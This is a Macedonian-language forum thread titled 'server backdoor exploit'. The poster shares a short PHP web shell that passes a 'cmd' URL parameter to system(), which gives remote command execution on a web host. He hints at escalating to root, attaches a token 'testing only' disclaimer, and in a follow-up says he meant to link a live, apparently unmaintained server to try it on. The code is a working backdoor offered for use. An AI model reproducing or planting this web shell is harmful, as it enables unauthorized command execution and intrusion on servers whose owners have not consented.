server backdoor exploit
:: Администрација :: Канта
Страна 1 of 1
server backdoor exploit
eve vi eden exploit napraven vo php. neznam vo koj del e dupkata, dali e vo prelistuvacite koi vrakaat informacii koi ne treba da bidat vrateni ili vo samata system() funkcija vo php koja pri nejzino koristenje moze da se podigne shell od sistemot i da se napise bilo koja komanda. Problemot e sto dokolku imete user na host server, so koristenje na ovoj kod dobivate samo permisii za vasiot user, znaci nemate root permisii, no dokolku ste dobar bash skripter i znaete da napisete nekoj kod koj bi vi ovozmosil root permisii , serverot e vas )
eve go kodot, use it only for testing ( on your machine )
ne odgovaram za posledicite
eve go kodot, use it only for testing ( on your machine )
ne odgovaram za posledicite
<?php
echo "<form action=".$_SERVER['PHP_SELF'].">";
echo '<input type="text" name="cmd">';
echo "</form>";
if(isset($_GET['cmd'])){
echo "<pre>";
$cmd = ($_GET['cmd']);
system($cmd);
echo "</pre>";
}
?>
_EAX- VIP
-
Треснал Глупости : 193
Поени : 0
Репутација : 0
Поминат рок на траење : 114
Се наоѓам : vrska nemam
Ден на регистрирање : 2007-10-12
Re: server backdoor exploit
zaboraviv da vi ja dadam strana kolku samo da probate...tuka
probav momcite da gi kontaktiram i da im kazam da ja soshijat dupkata odnosno da ja isklucat system() funkcijata no nisto ne se sluci, izgleda serverot veke nikoj ne go odrzava a so toa znaci nema ni admini.
probav momcite da gi kontaktiram i da im kazam da ja soshijat dupkata odnosno da ja isklucat system() funkcijata no nisto ne se sluci, izgleda serverot veke nikoj ne go odrzava a so toa znaci nema ni admini.
_EAX- VIP
-
Треснал Глупости : 193
Поени : 0
Репутација : 0
Поминат рок на траење : 114
Се наоѓам : vrska nemam
Ден на регистрирање : 2007-10-12
:: Администрација :: Канта
Страна 1 of 1
Permissions in this forum:
Не можете да одговарате на темите во форумот